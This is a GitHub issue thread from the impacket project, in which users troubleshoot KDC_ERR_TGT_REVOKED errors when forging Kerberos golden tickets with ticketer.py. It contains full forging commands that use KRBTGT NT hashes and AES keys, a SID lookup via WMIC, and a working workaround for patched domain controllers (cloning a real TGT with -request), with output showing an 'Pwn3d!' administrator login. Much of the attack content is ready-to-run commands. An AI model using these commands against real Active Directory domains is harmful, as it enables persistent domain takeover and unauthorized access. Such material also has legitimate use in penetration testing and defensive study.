### ISSUE TITLE
KDC_ERR_TGT_REVOKED when using golden ticket from tickter.py

### ISSUE THREAD

**Issue by sbjarni** [fortra/impacket#1601]
### Configuration  
impacket version:  Impacket v0.11.0
Python version:  3.10.12
Target OS:  Ubuntu 22.04.2 LTS

### Issuing the tickets using three different commands
 ticketer.py -nthash xxXx -domain-sid S-1-5-21-xxx-xxx-xxx-domain xxx.xx.xx -user-id 500 -extra-pac -duration 1 administrator
 ticketer.py -nthash xxXx -domain-sid S-1-5-21-xxx-xxx-xxx-domain xxx.xx.xx -user-id 500 -old-pac -duration 1 administrator
 ticketer.py -nthash xxXx -domain-sid S-1-5-21-xxx-xxx-xxx-domain xxx.xx.xx -user-id 500 -duration 1 administrator

### Debug Output With Command String

smbexec.py -debug 'XXX.xxx.XXX/administrator@XXX.xxx.XXX.xxxx' -k -no-pass

```
[+] Impacket Library Installation Path: /usr/local/lib/python3.10/dist-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/XXX.xxx.XXX.xxx@XXX.xxx.XXX not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/XXX.xxx.XXX@XXX.xxx.XXX
[+] Using TGT from cache
[+] Trying to connect to KDC at XXX.xxx.XXX:88
[+] Server time (UTC): 2023-08-25 15:00:22
Traceback (most recent call last):
  File "/usr/local/bin/smbclient.py", line 100, in main
    smbClient.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip )
  File "/usr/local/lib/python3.10/dist-packages/impacket/smbconnection.py", line 335, in kerberosLogin
    raise e
  File "/usr/local/lib/python3.10/dist-packages/impacket/smbconnection.py", line 319, in kerberosLogin
    return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT,
  File "/usr/local/lib/python3.10/dist-packages/impacket/smb3.py", line 713, in kerberosLogin
    tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
  File "/usr/local/lib/python3.10/dist-packages/impacket/krb5/kerberosv5.py", line 444, in getKerberosTGS
    r = sendReceive(message, domain, kdcHost)
  File "/usr/local/lib/python3.10/dist-packages/impacket/krb5/kerberosv5.py", line 91, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

```

### Additional context  
The error KDC_ERR_TGT_REVOKED is present for every ticket generated from the ticketer.py commands above.

**Comment by Pri3st** [comment]
I get the same errors as well when I try to generate tickets for any user other than `Administrator`.

**Comment by anadrianmanrique** [comment]
which version of windows you're trying to authenticate to ?
which version of windows is running the DC ?

**Comment by Pri3st** [comment]
Windows 10/Server 2022

**Comment by anadrianmanrique** [comment]
Ok I'm kind of able to reproduce the issue, BUT only when **nthash** it's passed to ticketer.py . I'm not experiencing the issue when **aesKey** it's being passed though. Please can you confirm this?

**Comment by sbjarni** [comment]
@anadrianmanrique This worked in my case. Thank you for pointing this out.

Do you have any idea on why this fails when using the **nthash** ?

**Comment by anadrianmanrique** [comment]
so I tried:
 ticket forged with ticketer.py
         rc4/nthash => smbclient.py => KDC_ERR_TGT_REVOKED(TGT has been revoked)
         aes256       => smbclient.py => OK
 ticket forged with rubeus
         rc4/nthash => smbclient.py => KDC_ERR_TGT_REVOKED(TGT has been revoked)
         aes256       => smbclient.py => OK
 ticket forged with ticketer.py
         rc4/nthash => linux smbclient => KDC_ERR_TGT_REVOKED(TGT has been revoked)
         aes256       => linux smbclient => OK

**Comment by WarrenVos** [comment]
Still getting the same issue with both nthash and aes256 key

**Comment by earlesshoichi** [comment]
When using using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag. 

Example:

impacket-ticketer -nthash <HASH> -domain-sid <DOMAIN SID> -domain <DOMAIN NAME> -user-id <ID of USER> <Whatever name to the file>

To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='<name of user' get sid")

**Comment by 1aadiez** [comment]
That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

**Comment by brzzh** [comment]
I would like to chime in, running `0.13.0.dev0+20241127.154729.af51dfd1` from pip and im unable to generate golden ticket with `-nthash`, if instead i chose `-aeskey` it works as expected.

**Comment by Skriep** [comment]
Same issue here with Impacket v0.12.0. I keep getting KDC_ERR_TGT_REVOKED whenever the ticket is forged with `-nthash`, but it works fine with `-aesKey`. Setting `-user-id` seems to have no effect.

**Comment by hoor113** [comment]
Hi, I'm using Impacket v0.13.0, but i got the KDC_ERR_TGT_REVOKED even after using both -aesKey (i tried both aes256 and aes128) and -nthash flags.

**Comment by earlesshoichi** [comment]
> Hi, I'm using Impacket v0.13.0, but i got the KDC_ERR_TGT_REVOKED even after using both -aesKey (i tried both aes256 and aes128) and -nthash flags.

Hmm... I ran the same commands using v0.13.0, I am guessing it depends on the victim box. Try to include the example commands you're running and state where you got the parameters. That might help.

**Comment by wanmywan** [comment]
#### Solution: Use -request flag to clone a real TGT from KDC
I encountered the same KDC_ERR_TGT_REVOKED error when using golden tickets forged from scratch with ticketer.py.
The issue is that modern Windows Server (2016+) with KB5008380 patch has strict PAC validation. Tickets forged from scratch have PAC structures that don't match what the KDC expects.
Solution
Use the -request flag to request a real TGT from the KDC first, then clone and modify it:
```bash 
ticketer.py -request \
    -domain YOURLAB.LOCAL \
    -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \
    -user validuser \
    -hashes :xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx \
    -dc-ip 192.168.1.10 \
    -aesKey xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx \
    -nthash xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx \
    Administrator
```

### Example Output 
```bash
Impacket v0.14.0.dev0+20260130.223114.851fea86 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting TGT to target domain to use as basis
[*] Customizing ticket for YOURLAB.LOCAL/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
bash$ export KRB5CCNAME=Administrator.ccache
```
```bash
(env) ☁  golden-ticket  klist
Credentials cache: FILE:Administrator.ccache
        Principal: Administrator@xxx.LOCAL

  Issued                Expires               Principal
Feb  3 04:31:32 2026  Feb  1 04:31:32 2036  krbtgt/xxx.LOCAL@xxx.LOCAL
```
```bash
(env) ☁  golden-ticket  nxc smb GOLD.xxx.local -k --use-kcache
SMB         GOLD.xxx.local 445    GOLD             [*] Windows 10 / Server 2019 Build 17763 x64 (name:GOLD) (domain:xxx.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         GOLD.xxx.local 445    GOLD             [+] xxx.LOCAL\Administrator from ccache (Pwn3d!)
(env) ☁  golden-ticket
```
#### Explanation

ParameterDescription-requestRequest real TGT from KDC, then clone and modify it-user + -hashesValid domain user credentials to request initial TGT-aesKeyKRBTGT AES256 key (for decrypting/re-encrypting ticket)-nthashKRBTGT NTLM hash (for re-signing PAC checksums)
Why this works

-request fetches a legitimate TGT from KDC with proper PAC structure
ticketer.py clones this ticket and modifies username to Administrator
Ticket is re-signed using KRBTGT keys
Result: Golden ticket with valid PAC structure that passes KDC validation

### Tested on
```
Impacket v0.14.0.dev0
Target: Windows Server 2019 Build 17763 (fully patched)
Works against DCs with KB5008380 PAC validation enabled
```

**Comment by XxMrNobodyxX** [comment]
This works for me:

`impacket-ticketer -aesKey <key> -domain-sid <sid> -domain domain.local -user-id 5150 mrnobody`

You have to have the RID and the name of a domain administrator that exists in the domain.
